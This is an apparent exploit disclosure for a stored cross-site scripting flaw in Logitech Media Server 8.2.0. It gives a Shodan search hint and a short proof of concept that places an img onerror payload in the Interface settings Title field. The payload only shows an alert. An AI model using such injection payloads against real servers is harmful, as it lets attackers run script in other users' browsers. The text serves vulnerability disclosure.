Logitech Media Server version 8.2.0 suffers from a cross site scripting vulnerability.
# Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
# Shodan Dork: Search Logitech Media Server
# Date: 12.10.2021
# Exploit Author: Mert Das
# Vendor Homepage: www.logitech.com
# Version: 8.2.0
# Tested on: Windows 10, LinuxPOC:
1. Go to Settings / Interface tab
2. Add payload to Title section
3. Payload : "><img src=1 onerror=alert(1)>
4. Alert will popup
Related posts:
"I Had a Dream" and Generative AI Jailbreaks
Nitrokod Crypto Miner Infected Over 111,000 Users with Copies of Popular Software
Microsoft Issues Fix for Exchange Y2K22 Bug That Crippled Email Delivery Service
New malware backdoors VMware ESXi servers to hijack virtual machines
SFPD: Suspects In Violent Smash And Grab Robberies, Car Burglaries Will Be Arrested, Convicted